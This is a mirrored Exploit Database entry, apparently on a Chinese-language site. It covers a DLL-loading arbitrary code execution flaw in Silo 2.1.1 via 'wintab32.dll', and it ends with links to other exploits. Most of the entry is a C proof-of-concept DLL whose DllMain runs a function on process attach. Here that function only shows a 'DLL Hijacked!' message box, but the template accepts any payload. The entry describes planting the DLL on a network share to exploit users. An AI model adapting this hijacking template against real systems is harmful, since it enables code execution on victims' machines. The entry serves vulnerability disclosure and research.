Silo 2.1.1 – ‘wintab32.dll’ DLL Loading Arbitrary Code Execution

Exploit Database
127 阅读

作者： Gjoko Krstic

日期： 2010-11-08
类别：
- remote
平台：
- windows
来源：https://www.exploit-db.com/exploits/34978/

// source: https://www.securityfocus.com/bid/44726/info

Silo is prone to a vulnerability that lets attackers execute arbitrary code.

An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file.

Silo 2.1.1 is vulnerable; other versions may also be affected.

#include <windows.h>

BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)

{

switch (fdwReason)

{

case DLL_PROCESS_ATTACH:

dll_mll();

case DLL_THREAD_ATTACH:

case DLL_THREAD_DETACH:

case DLL_PROCESS_DETACH:

break;

}

return TRUE;

}

int dll_mll()

{

MessageBox(0, "DLL Hijacked!", "DLL Message", MB_OK);

}

last Exploits
Silo 2.1.1 – ‘wintab32.dll’ DLL Loading Arbitrary Code Execution的更多信息

CamShot 1.2 – Overwrite (SEH)：
Microsoft Office SharePoint Server 2007 – Remote Code Execution (MS10-104) (Metasploit)：
Microsoft Internet Explorer 8 – URI Validation Remote Code Execution：
Edraw Office Viewer Component 7.4 – ActiveX Stack Buffer Overflow：
weborf 0.12.2 – Directory Traversal：
ProFTPd 1.3.5 – ‘mod_copy’ Remote Command Execution (2)：
Airties – login-cgi Buffer Overflow (Metasploit)：
FirePHP Firefox Plugin 0.7.1 – Remote Command Execution：